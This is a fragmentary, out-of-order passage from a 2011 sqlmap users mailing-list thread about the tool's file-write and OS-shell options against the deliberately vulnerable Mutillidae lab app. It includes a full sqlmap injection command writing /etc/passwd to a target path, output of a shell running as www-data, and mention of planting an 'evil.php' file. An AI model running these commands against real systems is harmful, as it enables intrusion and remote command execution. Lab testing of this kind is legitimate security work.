1:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press
>> ENTER
>> os-shell> id
>> do you want to retrieve the command standard output? [Y/n/a]
>> command standard output: 'uid=33(www-data) gid=33(www-data)
>> groups=33(www-dat
or codes detected during testing:
> 404 (Not Found) - 1 times
> [23:51:44] [INFO] Fetched data logged to text files under
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'
>
> [*] shutting down at 23:51:44
> --8<--
>
> Cheers,
> Bernardo
&
I didn't
> realise that this also includes the destination file name. With that
> included, it works like a dream.
>
> What I haven't managed to get going properly yet is the --os-cmd flag. The
> temp stager file does appear, but is empty, 0KB. However; I think I'll
ar, but is empty, 0KB. However; I think I'll save that one
for another day!
Regards
Chris
--
-Original Message-
From: "Bernardo Damele A. G."
Date: Wed, 6 Jul 2011 23:42:22
To: Chris Oakley
Cc:
Subject: Re: [sqlmap-users] File Writing
Hi Chris,
To me it wo
Hi Chris,
To me it works well:
--8<--
$ python sqlmap.py -u
"http://debian32/mutillidae/index.php?page=user-info.php"; --forms -p
view_user_name --risk 3 --level 3 --parse-errors --file-write
/etc/passwd --file-dest /tmp/test --flush-session
sqlmap/1.0-dev (r4217) - automatic SQL injection an
Hi
I'm playing with file writing. I have a full privs root user set up in
mysql and am using
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10to
play with. I've set up a /temp folder below the web root of the app.
I've put a file "evil.php" in the sq
